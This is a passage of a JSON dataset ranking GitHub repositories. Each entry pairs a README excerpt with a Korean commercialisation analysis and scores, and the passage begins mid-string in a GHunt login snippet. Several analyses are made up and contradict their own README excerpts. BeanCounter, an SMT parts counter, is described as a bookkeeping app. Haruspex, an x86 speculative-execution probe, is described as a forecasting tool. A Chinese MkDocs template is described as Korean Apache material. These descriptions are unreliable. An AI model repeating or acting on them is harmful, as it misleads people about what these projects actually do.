:\n```bash\n$ ghunt login\n\n[1] (Companion) Put GHunt on listening mode (currently not compatible with docker)\n[2] (Companion) Paste base64-encoded cookies\n[3] Enter ","composite_score":0.0914,"license_safety_tag":"unknown"},{"name":"LeDDGroup/typescript-transform-paths","github_url":"https://github.com/LeDDGroup/typescript-transform-paths","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":5,"description":"# TypeScript Transform Paths 평가\n\n## 왜 보물인가\n웹사이트나 앱 개발할 때 폴더 구조를 간단하게 정리해주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 개발사**: 웹 애플리케이션 개발 시간을 30% 단축하고 싶은 스타트업에 유료 플러그인으로 판매\n2. **내부 업무 도구*","readme_excerpt":"<h1 align=\"center\">typescript-transform-paths</h1>\n<p align=\"center\">Transform compiled source module resolution paths using TypeScript's <code>paths</code> config, and/or custom resolution paths</p>\n<div align=\"center\">\n\n[![npm version](https://img.shields.io/npm/v/typescript-transform-paths.svg)](https://www.npmjs.com/package/typescript-transform-paths)\n[![Build Status](https://img.shields.io/endpoint.svg?url=https%3A%2F%2Factions-badge.atrox.dev%2FLeDDGroup%2Ftypescript-transform-paths%2Fbadge%3Fref%3Dmaster&style=flat)](https://actions-badge.atrox.dev/LeDDGroup/typescript-transform-paths/goto?ref=master)\n[![Conventional Commits](https://img.shields.io/badge/Conventional%20Commits-1.0.0-yellow.svg)](https://conventionalcommits.org)\n[![Code Style: Prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg)](https://github.com/prettier/prettier)\n\n</div>\n\n> [!TIP]  \n> Upgrading from v3 to v4? See the [migration](./docs/migrating-to-v4.md) documentation.\n\n> [!IMPORTANT]  \n> W","composite_score":0.0911,"license_safety_tag":"safe"},{"name":"apachecn/home","github_url":"https://github.com/apachecn/home","stars":6,"language":"CSS","license":"unknown","abandonment_months":7,"description":"# apachecn/home 상용화 분석\n\n## 왜 보물인가\nApache 관련 한국어 학습 자료를 체계적으로 정리한 오픈소스 교육 허브로, 기술 진입장벽을 낮추는 지식 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 한국 개발자 대상 유료 강좌 콘텐츠로 패키징하여 구독형 학습 서비스 제공\n2. **기업 연수 도구**: 중소 IT회","readme_excerpt":"# Welcome to MkDocs\n\nFor full documentation visit [mkdocs.org](https://www.mkdocs.org).\n\n> 依赖主题\n\n- <https://github.com/mkdocs/mkdocs-basic-theme>\n\n## Commands\n\n* `mkdocs new [dir-name]` - Create a new project.\n* `mkdocs serve` - Start the live-reloading docs server.\n* `mkdocs build` - Build the documentation site.\n* `mkdocs -h` - Print help message and exit.\n\n## Project layout\n\n    mkdocs.yml    # The configuration file.\n    docs/\n        index.md  # The documentation homepage.\n        ...       # Other markdown pages, images and other files.\n\n","composite_score":0.0911,"license_safety_tag":"unknown"},{"name":"rebase-network/Dapp-Learning","github_url":"https://github.com/rebase-network/Dapp-Learning","stars":11,"language":"Solidity","license":"MIT","abandonment_months":2,"description":"# Dapp-Learning 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 배우고 싶은 초보자들이 실습할 수 있는 교육 자료 모음으로, 복잡한 암호화폐 기술을 누구나 이해할 수 있게 정리해놓았습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 블록체인 온라인 학원이나 대학의 수강생들에게 실습 교재와 샘플 코드를 제공하는 SaaS 교육 서비스\n2","readme_excerpt":"<div align=\"center\">\n  <img src=\"./DappLearning-logo.png\" style=\"margin: 0 auto 40px;\" />\n  <!-- <h1>Dapp Learning</h1> -->\n  <h4 align=\"center\">\n    Definitive Guide for Decentralized-app(Dapp) Development on Blockchain\n  </h4>\n  <p>Step-by-step Dapp practice through classical projects.</p>\n  <br />\n  <p>\n    <a href=\"https://github.com/Dapp-Learning-DAO/Dapp-Learning/tree/main/docs/imgs/wechat-group-helper.png\"><img alt=\"Wechat group helper\" src=\"https://img.shields.io/static/v1?&label=&logo=wechat&message=wechat group&color=brightgreen&logoColor=white\"></a>\n    <a href=\"https://twitter.com/Dapp_Learning\"><img alt=\"Twitter Follow\" src=\"https://img.shields.io/twitter/follow/dapp_learning?label=Follow\"></a>\n    <a href=\"https://www.youtube.com/c/DappLearning\"><img alt=\"YouTube Channel Subscribers\" src=\"https://img.shields.io/youtube/channel/subscribers/UCdJKZVxO55N3n2BQYXMDAcQ?style=social\"></a>\n    <a href=\"https://discord.gg/cRYNYXqPeR\"><img src=\"https://img.shields.io/discord/907080","composite_score":0.0911,"license_safety_tag":"safe"},{"name":"roseduan/rosedb","github_url":"https://github.com/roseduan/rosedb","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":3,"description":"# rosedb 상용화 분석 보고서\n\n## 왜 보물인가\n데이터를 빠르고 안전하게 저장하는 기본 기술로, 금융·쇼핑·클라우드 서비스 등 데이터를 다루는 거의 모든 디지털 서비스의 기초가 되는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS - 데이터 분석 플랫폼**\n소규모 기업의 매출·고객 데이터를 빠르게 저장하고 분석하는 클라우드 서비스로","readme_excerpt":"<div align=\"center\">\n<strong>\n<samp>\n\n[English](https://github.com/rosedblabs/rosedb/blob/main/README.md) · [简体中文](https://github.com/rosedblabs/rosedb/blob/main/README-CN.md)\n\n</samp>\n</strong>\n</div>\n\n## What is ROSEDB\n\nrosedb is a lightweight, fast and reliable key/value storage engine based on [Bitcask](https://riak.com/assets/bitcask-intro.pdf) storage model.\n\nThe design of Bitcask was inspired, in part, by log-structured filesystems and log file merging.\n\n## Status\nrosedb is well tested and ready for production use. There are serveral projects using rosedb in production as a storage engine.\n\n**Didn't find the feature you want? Feel free to open an issue or PR, we are in active development.**\n\n## Design overview\n\n![](https://github.com/rosedblabs/rosedb/blob/main/docs/imgs/design-overview-rosedb.png)\n\nRoseDB log files are using the WAL(Write Ahead Log) as backend, which are append-only files with multiple blocks.\n\n> wal: https://github.com/rosedblabs/wal\n\n## Key features\n\n### Stre","composite_score":0.091,"license_safety_tag":"safe"},{"name":"irwir/eMule","github_url":"https://github.com/irwir/eMule","stars":13,"language":"C++","license":"unknown","abandonment_months":5,"description":"# irwir/eMule 보물 분석\n\n## 왜 보물인가\n인터넷에서 파일을 빠르고 안전하게 주고받을 수 있는 기술을 현대식으로 재구성한 것으로, 중앙 관리자 없이 사용자들이 직접 연결되어 작동하는 분산형 파일 공유 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **대용량 파일 공유 SaaS**: 기업의 대규모 동영상, 설계도, 데이터를 안전하게 배포하는 구독","readme_excerpt":"","composite_score":0.091,"license_safety_tag":"unknown"},{"name":"DEV-OCR/polymarket-arbitrage-trading-bot","github_url":"https://github.com/DEV-OCR/polymarket-arbitrage-trading-bot","stars":288,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.091,"license_safety_tag":"unknown"},{"name":"emicklei/go-restful","github_url":"https://github.com/emicklei/go-restful","stars":5,"language":"Go","license":"mit","abandonment_months":5,"description":"# go-restful 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 개발자들이 반복적으로 작성하는 기초 코드를 자동으로 처리해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 협업 도구나 관리 시스템의 백엔드 구축 시간 단축\n- **내부 업무 도구**: 기업 내부 데이터 조회 ","readme_excerpt":"go-restful\n==========\npackage for building REST-style Web Services using Google Go\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/emicklei/go-restful)](https://goreportcard.com/report/github.com/emicklei/go-restful)\n[![Go Reference](https://pkg.go.dev/badge/github.com/emicklei/go-restful.svg)](https://pkg.go.dev/github.com/emicklei/go-restful/v3)\n[![codecov](https://codecov.io/gh/emicklei/go-restful/branch/master/graph/badge.svg)](https://codecov.io/gh/emicklei/go-restful)\n\n- [Code examples use v3](https://github.com/emicklei/go-restful/tree/v3/examples)\n\nREST asks developers to use HTTP methods explicitly and in a way that's consistent with the protocol definition. This basic REST design principle establishes a one-to-one mapping between create, read, update, and delete (CRUD) operations and HTTP methods. According to this mapping:\n\n- GET = Retrieve a representation of a resource\n- POST = Create if you are sending content to the server to create a subordinate of the spe","composite_score":0.0906,"license_safety_tag":"safe"},{"name":"imaNNeoFighT/fl_chart","github_url":"https://github.com/imaNNeoFighT/fl_chart","stars":8,"language":"Dart","license":"mit","abandonment_months":1,"description":"# fl_chart 저장소 분석\n\n## 왜 보물인가\n그래프와 차트를 쉽게 만들 수 있는 도구로, 데이터를 시각적으로 예쁘게 표현해야 하는 모든 앱과 웹사이트에 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 판매 현황, 고객 분석 등을 보여주는 대시보드 기능\n- **내부 업무 도구**: 회사의 월별 실적, 팀별 목표 달성률을 시각화하는","readme_excerpt":"![FL Chart Logo](https://github.com/imaNNeo/fl_chart/raw/main/repo_files/images/landing_logo.png)\n\n[![pub package](https://img.shields.io/pub/v/fl_chart.svg)](https://pub.dartlang.org/packages/fl_chart)\n[![codecov](https://codecov.io/gh/imaNNeo/fl_chart/branch/main/graph/badge.svg?token=XBhsIZBbZG)](https://codecov.io/gh/imaNNeo/fl_chart)\n<a href=\"https://github.com/Solido/awesome-flutter#charts\"><img src=\"https://img.shields.io/badge/awesome-flutter-blue.svg?longCache=true\" alt=\"Awesome Flutter\"></a>\n<a href=\"https://pub.dev/packages/fl_chart\"><img alt=\"GitHub Repo stars\" src=\"https://img.shields.io/github/stars/imaNNeo/fl_chart\"></a>\n<a href=\"https://github.com/imaNNeo/fl_chart/graphs/contributors\"><img alt=\"GitHub contributors\" src=\"https://img.shields.io/github/contributors/imaNNeo/fl_chart\"></a>\n<a href=\"https://githubc.com/imaNNeo/fl_chart/issues?q=is%3Aissue+is%3Aclosed\"><img src=\"https://img.shields.io/github/issues-closed-raw/imaNNeo/fl_chart\" alt=\"GitHub closed issues\"></a>\n!","composite_score":0.0904,"license_safety_tag":"safe"},{"name":"xairy/linux-kernel-exploitation","github_url":"https://github.com/xairy/linux-kernel-exploitation","stars":5,"language":"","license":"CC-BY-4.0","abandonment_months":3,"description":"# xairy/linux-kernel-exploitation 분석\n\n## 왜 보물인가\n컴퓨터의 가장 핵심 부분(커널)의 보안 약점을 찾고 고치는 방법을 배울 수 있는 교육 자료이며, 이를 통해 전 세계 수백만 대 컴퓨터의 보안을 강화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 교육 플랫폼**: 대기업의 보안 담당자들을 위한 실습 기반 온","readme_excerpt":"Linux Kernel Exploitation\n=========================\n\nA collection of links related to Linux kernel security and exploitation.\n\nUpdated bimonthly. Pull requests are welcome as well.\n\nFollow [@andreyknvl](https://x.com/andreyknvl) on X, [@xairy@infosec.exchange](https://infosec.exchange/@xairy) on Mastodon, or [@andreyknvl](https://bsky.app/profile/andreyknvl.bsky.social) on Bluesky to be notified of updates.\n\nSubscribe to @linkersec on [Telegram](https://t.me/linkersec), [X](https://x.com/linkersec), [Mastodon](https://infosec.exchange/@linkersec), [Bluesky](https://bsky.app/profile/linkersec.bsky.social), or [Reddit](https://www.reddit.com/r/linkersec) for highlights.\n\n\n## Trainings\n\nSee [xairy.io/trainings/](https://xairy.io/trainings/).\n\n\n## Contents\n\n- [Books](#books)\n- [Techniques](#techniques)\n\t- [Exploitation](#exploitation)\n\t- [Protection Bypasses](#protection-bypasses)\n- [Vulnerabilities](#vulnerabilities)\n\t- [Info-leaks](#info-leaks)\n\t- [LPE](#lpe)\n\t- [RCE](#rce)\n\t- [Other](#o","composite_score":0.0903,"license_safety_tag":"unknown"},{"name":"juliocesarfort/public-pentesting-reports","github_url":"https://github.com/juliocesarfort/public-pentesting-reports","stars":16,"language":"HTML","license":"unknown","abandonment_months":0,"description":"# juliocesarfort/public-pentesting-reports 분석\n\n## 왜 보물인가\n기업의 보안 취약점을 찾아내는 전문가들이 실제로 수행한 보안 진단 보고서들을 모아놓은 자료로, 기업들이 자신의 시스템을 어떻게 보호해야 하는지 배울 수 있는 실전 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 교육 플랫폼**\n- 중소 기업들","readme_excerpt":"# Public penetration testing reports\n\nA repository containing public penetration test reports published by consulting firms and academic security groups.\n\nMaintained by Julio @ Blaze Information Security (https://www.blazeinfosec.com).\n\nBased on a list [started in 2015](https://web.archive.org/web/20151031174146/http://roselabs.nl/links#audit-reports) by Arne Padmos. See [this repo](https://github.com/arnepadmos/threats) for a similar effort in the area of threat modelling.\n","composite_score":0.0902,"license_safety_tag":"unknown"},{"name":"s-macke/jor1k","github_url":"https://github.com/s-macke/jor1k","stars":6,"language":"JavaScript","license":"bsd-2-clause","abandonment_months":7,"description":"# jor1k 저장소 분석\n\n## 왜 보물인가\n컴퓨터 구조를 학습하고 싶은 학생들이 웹 브라우저에서 직접 작동하는 컴퓨터를 만들어 볼 수 있는 실험 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 대학의 컴퓨터공학 강좌에서 학생들이 구독하는 온라인 실습 플랫폼\n2. **기업 연수 도구**: IT 기업의 신입사원 교육에서 컴퓨터 기초 원","readme_excerpt":"# jor1k\n\n![jor1k](https://jor1k.com/images/jor1k2.gif)\n\njor1k is a OpenRISC 1000 emulator written in JavaScript running Linux. It runs in almost any modern web browser. \nHave a try and see if it runs in your browser by opening the [demo][project demo].\nMore information can be found on the [Wiki][project wiki] pages. \n\n### Demos\n\n* Main [demo][project demo] page\n* [Edit, compile and run](https://s-macke.github.io/jor1k/demos/compile.html) C code in your browser\n* [Edit, compile and run](https://cs-education.github.io/sys/#VM) C code from the University of Illinois\n* Symmetric multiprocessing with  [2 cores](https://s-macke.github.io/jor1k/demos/main.html?cpu=smp&n=2), [4 cores](https://s-macke.github.io/jor1k/demos/main.html?cpu=smp&n=4), [8 cores](https://s-macke.github.io/jor1k/demos/main.html?cpu=smp&n=8), [16 cores](https://s-macke.github.io/jor1k/demos/main.html?cpu=smp&n=16) (unstable with inreasing cores)\n* Simple [demo](https://s-macke.github.io/jor1k/demos/simple.html)\n* RTEMS ","composite_score":0.0901,"license_safety_tag":"safe"},{"name":"can1357/haruspex","github_url":"https://github.com/can1357/haruspex","stars":7,"language":"C++","license":"GPL-3.0","abandonment_months":5,"description":"# Haruspex 저장소 분석\n\n## 왜 보물인가\n미래를 예측하거나 패턴을 분석하는 기능을 가진 도구로, 데이터 기반 의사결정이 필요한 비즈니스에서 경쟁력을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업들이 월 구독으로 이용하는 판매 예측 또는 트렌드 분석 웹 서비스\n- **내부 업무 도구**: 대기업의 전략팀이 시장","readme_excerpt":"<p align=\"center\">\n  <img width=\"256\" heigth=\"256\" src=\"https://haruspex.can.ac/static/logo.svg\">\n   <h1 align=\"center\" style=\"border-bottom: none\">Haruspex</h1>\n   <h4 align=\"center\">/həˈrʌspeks/</h4>\n   <h6 align=\"center\">A religious official in ancient Rome who predicted the future or interpreted the meaning of events by examining the insides of birds or animals that had been sacrificed.</h6>\n   <p align=\"center\">\n    Exploration of x86-64 ISA using speculative execution.\n   </p>\n   <h1></h1>\n</p>\n\nHaruspex is a project attempting to explore and audit the x86-64 instruction set by (ab)using speculative execution and certain low-level performance counters Intel CPUs provide mainly for the identification of undocumented opcodes and deducing the pipeline properties of each instruction. You can find the article explaining the methodology [here](https://blog.can.ac/2021/03/22/speculating-x86-64-isa-with-one-weird-trick/).\n\n- `/analysis` contains the Node.js server responsible for reducin","composite_score":0.0897,"license_safety_tag":"restricted"},{"name":"graymicrolab/Bacterial_Genetics_Course_Packet","github_url":"https://github.com/graymicrolab/Bacterial_Genetics_Course_Packet","stars":7,"language":"","license":"unknown","abandonment_months":5,"description":"# Bacterial Genetics Course Packet 분석\n\n## 왜 보물인가\n생물학 학생들이 복잡한 세균 유전학을 직관적으로 배울 수 있도록 정리된 교육 자료로, 대학 강의실과 온라인 학습 시장에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **교육 SaaS 서비스**: 생물학 온라인 학습 플랫폼(예: 칸아카데미 유형)에 커리큘럼 통","readme_excerpt":"# Bacterial_Genetics_Course_Packet\nCourse packets for Bacterial Genetics and Physiology. Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.\nMichael J. Gray, M.S., Ph.D.\n\nIn this course, my goal is for you to learn how to think about and apply the tools of bacterial molecular genetics to solve scientific problems, and then to use that knowledge to build a strong foundation of understanding the molecular mechanisms by which bacteria grow, function, and cause disease. To achieve this goal, we will need to build your skills in two fundamental areas:\n\n• Scientific literacy: understanding what is and isn’t known, how those facts fit into the larger framework of scientific knowledge, and how to search and read the scientific literature\n\n• Scientific proficiency: understanding how to design, carry out, and interpret experiments, knowing what tools you have available and creatively applying those tools to answer specific questions\n\nThe product of scientific work","composite_score":0.0896,"license_safety_tag":"unknown"},{"name":"cymcsg/UltimateRecyclerView","github_url":"https://github.com/cymcsg/UltimateRecyclerView","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":3,"description":"# UltimateRecyclerView 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱에서 길고 복잡한 목록을 빠르고 부드럽게 표시해주는 핵심 라이브러리로, 많은 앱 개발자들이 필요로 하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 앱 SaaS**: 인스타그램처럼 무한 스크롤하는 피드를 표시하는 SaaS 플랫폼의 백엔드 기술로 활용\n","readme_excerpt":"# UltimateRecyclerView\n\n [ ![Download](https://api.bintray.com/packages/marshalchen/UltimateRecyclerview/UltimateRecyclerview/images/download.svg) ](https://bintray.com/marshalchen/UltimateRecyclerview/UltimateRecyclerview/_latestVersion)[![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)[![Stories in Ready](https://badge.waffle.io/cymcsg/UltimateRecyclerView.svg?label=ready&title=Ready)](http://waffle.io/cymcsg/UltimateRecyclerView)\n\n\n\n\n#### Master branch:[![Build Status](https://travis-ci.org/cymcsg/UltimateRecyclerView.svg?branch=master)](https://travis-ci.org/cymcsg/UltimateRecyclerView)\n\n#### Dev branch:[![Build Status](https://travis-ci.org/cymcsg/UltimateRecyclerView.svg?branch=dev)](https://travis-ci.org/cymcsg/UltimateRecyclerView)\n\n##### Project website:[https://github.com/cymcsg/UltimateRecyclerView](https://github.com/cymcsg/UltimateRecyclerView)\n\n\n\n### Description\n\nUltimateRecyclerView is a RecyclerView(advanc","composite_score":0.0896,"license_safety_tag":"safe"},{"name":"sp614x/optifine","github_url":"https://github.com/sp614x/optifine","stars":5,"language":"","license":"unknown","abandonment_months":4,"description":"# OptiFine 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임의 그래픽 성능을 획기적으로 개선해주는 도구로, 수백만 명의 게이머들이 필수적으로 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 성능 최적화 SaaS**: 게이머들을 위한 클릭 한 번으로 최적화 설정을 자동 적용해주는 웹 서비스\n2. **게임방(PC방) 운영 도구**: 여러","readme_excerpt":"","composite_score":0.0895,"license_safety_tag":"unknown"},{"name":"omarroth/invidious","github_url":"https://github.com/omarroth/invidious","stars":5,"language":"Crystal","license":"AGPL-3.0","abandonment_months":0,"description":"# Invidious 프로젝트 분석\n\n## 왜 보물인가\n유튜브를 더 빠르고 간단하게 이용할 수 있도록 만든 대체 플랫폼으로, 광고 없이 영상을 시청하려는 사람들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 광고 없는 영상 스트리밍 구독 서비스로 월 정액 요금 모델 운영\n2. **내부 업무 도구**: 기업의 교육·홍보 영상을 자","readme_excerpt":"<div align=\"center\">\n  <img src=\"assets/invidious-colored-vector.svg\" width=\"192\" height=\"192\" alt=\"Invidious logo\">\n  <h1>Invidious</h1>\n\n  <a href=\"https://www.gnu.org/licenses/agpl-3.0.en.html\">\n    <img alt=\"License: AGPLv3\" src=\"https://shields.io/badge/License-AGPL%20v3-blue.svg\">\n  </a>\n  <a href=\"https://github.com/iv-org/invidious/actions\">\n    <img alt=\"Build Status\" src=\"https://github.com/iv-org/invidious/workflows/Invidious%20CI/badge.svg\">\n  </a>\n  <a href=\"https://github.com/iv-org/invidious/commits/master\">\n    <img alt=\"GitHub commits\" src=\"https://img.shields.io/github/commit-activity/y/iv-org/invidious?color=red&label=commits\">\n  </a>\n  <a href=\"https://github.com/iv-org/invidious/issues\">\n    <img alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/iv-org/invidious?color=important\">\n  </a>\n  <a href=\"https://github.com/iv-org/invidious/pulls\">\n    <img alt=\"GitHub pull requests\" src=\"https://img.shields.io/github/issues-pr/iv-org/invidious?color=blueviolet","composite_score":0.0895,"license_safety_tag":"risky"},{"name":"NPoole/BeanCounter","github_url":"https://github.com/NPoole/BeanCounter","stars":8,"language":"Eagle","license":"CC-BY-SA-4.0","abandonment_months":5,"description":"# BeanCounter 저장소 분석\n\n## 왜 보물인가\n가정이나 소규모 사업의 돈 관리를 자동으로 해주는 도구로, 복잡한 회계 프로그램 없이도 간단하게 수입·지출을 추적할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소상공인 대상 월 구독형 가계부·장부 관리 웹앱\n- **내부 업무 도구**: 중소기업의 팀 경비 관리, 프로젝트별 ","readme_excerpt":"# BeanCounter\n\n[![CC BY-SA 4.0][cc-by-sa-shield]][cc-by-sa]\n\nBeanCounter is an SMT parts counter that fits in your pocket. It’s battery powered and uses two IR photointerrupters to count parts about as fast as you can pull them through. It works with any opaque, 8-mm-wide carrier tape up to 2 mm in height, which covers most 0805-or-smaller LEDs and passives, as well as SOT23 transistors. It’s an affordable SMT tape counter without unnecessary bells and whistles.\n\n![BeanCounter on white background](https://github.com/NPoole/BeanCounter/blob/main/docs/BeanCounter-Feature_Lit.jpg?raw=true)\n<p align=\"center\"><em>Photo Courtesy of Hannah Wood/SparkFun Electronics</em></p>\n\n## Available Now at [Crowd Supply](https://www.crowdsupply.com/great-big-factory/beancounter), [Mouser](https://www.mouser.com/c/electromechanical/industrial-automation/?m=Great%20Big%20Factory), and [SparkFun](https://www.sparkfun.com/products/21738)\n\nTo use BeanCounter, simply turn it on and start pulling tape through. ","composite_score":0.0893,"license_safety_tag":"unknown"},{"name":"uber/deck.gl","github_url":"https://github.com/uber/deck.gl","stars":8,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Uber Deck.gl 저장소 분석\n\n## 왜 보물인가\n지도 위에 수백만 개의 데이터 포인트를 매끄럽게 시각화할 수 있는 기술로, 대규모 데이터를 한눈에 파악하고 싶은 모든 비즈니스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **부동산 중개 플랫폼**: 아파트·빌딩 위치를 지도에 띄워 비용·편의시설과 함께 비교\n- **물류 회사 내부 도구**: 배송","readme_excerpt":"<p align=\"right\">\n  <a href=\"https://npmjs.org/package/deck.gl\">\n    <img src=\"https://img.shields.io/npm/v/deck.gl.svg?style=flat-square\" alt=\"version\" />\n  </a>\n  <a href=\"https://github.com/visgl/deck.gl/actions?query=workflow%3Atest+branch%3Amaster\">\n    <img src=\"https://github.com/visgl/deck.gl/workflows/test/badge.svg?branch=master\" alt=\"build\" />\n  </a>\n  <a href=\"https://npmjs.org/package/deck.gl\">\n    <img src=\"https://img.shields.io/npm/dm/@deck.gl/core.svg?style=flat-square\" alt=\"downloads\" />\n  </a>\n  <a href='https://coveralls.io/github/visgl/deck.gl?branch=master'>\n    <img src='https://img.shields.io/coveralls/visgl/deck.gl.svg?style=flat-square' alt='Coverage Status' />\n  </a>\n</p>\n\n<h1 align=\"center\">deck.gl | <a href=\"https://deck.gl\">Website</a></h1>\n\n<h5 align=\"center\"> GPU-powered, highly performant large-scale data visualization</h5>\n\n[![docs](http://i.imgur.com/mvfvgf0.jpg)](https://visgl.github.io/deck.gl)\n\n\ndeck.gl is designed to simplify high-performance, Web","composite_score":0.0892,"license_safety_tag":"safe"},{"name":"russellgoldenberg/scrollama","github_url":"https://github.com/russellgoldenberg/scrollama","stars":59,"language":"HTML","license":"mit","abandonment_months":6,"description":"# Scrollama 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 스크롤할 때 특정 지점마다 자동으로 콘텐츠가 나타나거나 변하는 상호작용을 만들어주는 도구로, 현대적이고 engagement 높은 웹사이트를 쉽게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 시각화 SaaS 서비스**\n뉴스사, 마케팅 에이전시가 구독하는 인터랙티브 스토리텔","readme_excerpt":"<img src=\"https://russellsamora.github.io/scrollama/logo.png\" width=\"160\" alt=\"scrollama.js\"/>\n\n**Scrollama** is a modern & lightweight JavaScript library for scrollytelling\nusing\n[IntersectionObserver](https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API)\nin favor of scroll events. *Current version: 3.2.0*\n\n## 3.0\n#### Why 3.0?\nThe core parts of the Scrollama code base are being refactored for 3.0 to simplfy and clarify the logic. The goal behind this to ease make future maintainance, bug fixing, and feature additions easier moving forward.\n\n#### New Fetaures\n* Built-in resize using resize observers.\n* Custom offsets on steps with data attributes\n\n#### Deprecated Features\n* the `order` option\n\n## Important Changes\n- **Version 3.0.0+**: `order` has been deprecated.\n- **Version 2.0.0+**: `.onContainerEnter` and `.onContainerExit` have been deprecated in favor of CSS property `position: sticky;`. [How to use position sticky.](https://pudding.cool/process/scrollytell","composite_score":0.0892,"license_safety_tag":"safe"},{"name":"tlbootcamp/tlroadmap","github_url":"https://github.com/tlbootcamp/tlroadmap","stars":6,"language":"Vue","license":"CC-BY-SA-4.0","abandonment_months":6,"description":"# tlbootcamp/tlroadmap 분석\n\n## 왜 보물인가\n개발자가 되기 위한 학습 경로를 체계적으로 정리해놓은 오픈소스로, 누구나 무료로 IT 업계 진입 로드맵을 참고할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초보자를 위한 IT 학습 경로 추천 시스템으로 통합하여 수강생 유입 증대\n2. **기업 인재 양성 프로그","readme_excerpt":"![Logotype](logo.png)\n\n> Тимлид – это ❄️, потому что в каждой компании он уникален и неповторим.\n[Teamlead Roadmap](https://tlroadmap.io) – это карта навыков и компетенций тимлидов, которую можно адаптировать для любой компании и команды. Попробуйте приложить её и к себе!\n\n![Роадмап](https://tlroadmap.io/roadmap-ru.svg?sanitize=true)\n\n- [Сайт с базой знаний](https://tlroadmap.io)\n- [Telegram-чат проекта](https://tlinks.run/tlbootcamp)\n\n# Work in progress\nТекущий роадмап – не финальный, база знаний продолжает наполняться, а структура веток периодически обновляется. Мы будем очень рады вашему участию в проекте – не стесняйтесь публиковать Issue, закидывать свои pull request и присоединяться к обсуждению [в Telegram-чате](https://tlinks.run/tlbootcamp). Если вы готовы помочь и поделиться своим опытом – прочитайте [инструкцию по быстрому старту](https://tlroadmap.io/contributing.html).\n\n# Лицензия\nМы используем [лицензию Creative Commons Attribution-ShareAlike 4.0](https://tlroadmap.io/lic","composite_score":0.089,"license_safety_tag":"unknown"},{"name":"calibreapp/react-live-chat-loader","github_url":"https://github.com/calibreapp/react-live-chat-loader","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# React Live Chat Loader 사업화 분석\n\n## 왜 보물인가\n웹사이트에 실시간 채팅 기능을 빠르고 간단하게 추가할 수 있는 도구로, 고객 상담 비용을 절감하면서 웹사이트 속도는 유지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 고객지원 SaaS**\n- 온라인 쇼핑몰이 구매 전에 실시간으로 고객 질문에 답변할 수 있게 하는","readme_excerpt":"# React Live Chat Loader\n\n[![NPM package](https://img.shields.io/npm/v/react-live-chat-loader?color=informational)](https://www.npmjs.com/package/react-live-chat-loader)\n[![License](https://img.shields.io/github/license/calibreapp/react-live-chat-loader?color=informational)](https://github.com/calibreapp/react-live-chat-loader/blob/main/LICENSE)\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-success)](CODE_OF_CONDUCT.md)\n[![Contribution guidelines](https://img.shields.io/badge/PRs-welcome-success)](CONTRIBUTING.md)\n\nAn npm module that allows you to mitigate the negative performance and user\nexperience impact of chat tools. `react-live-chat-loader` shows a fake widget\nuntil the page has become idle or users are ready to interact with chat. Currently works with [Intercom](#intercom), [Help Scout](#help-scout), [Drift](#drift), [Messenger](#messenger), [Userlike](#userlike), [Front](#front), [Chatwoot](#chatwoot), [Hubspot](#hubspot) and [Adobe Dynamic Ch","composite_score":0.089,"license_safety_tag":"safe"},{"name":"lwindolf/liferea","github_url":"https://github.com/lwindolf/liferea","stars":5,"language":"C","license":"gpl-2.0","abandonment_months":0,"description":"# Liferea 상용화 분석 보고서\n\n## 왜 보물인가\n인터넷에 흩어진 뉴스와 블로그를 한곳에서 모아볼 수 있는 개인용 뉴스 수집기로, 정보 과다 시대에 필요한 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 업계 뉴스/경쟁사 동향을 자동으로 수집해주는 \"비즈니스 인텔리전스 대시보드\" 월 구독 서비스\n\n2. **내부 업","readme_excerpt":"![screenshot](https://lzone.de/liferea/screenshots/screenshot2.png)\n\nLiferea is a desktop feed reader/news aggregator that brings together all of the content from your favorite subscriptions into a simple interface that makes it easy to organize and browse feeds. Its GUI is similar to a desktop mail/news client, with an embedded web browser.\n\n[![Build 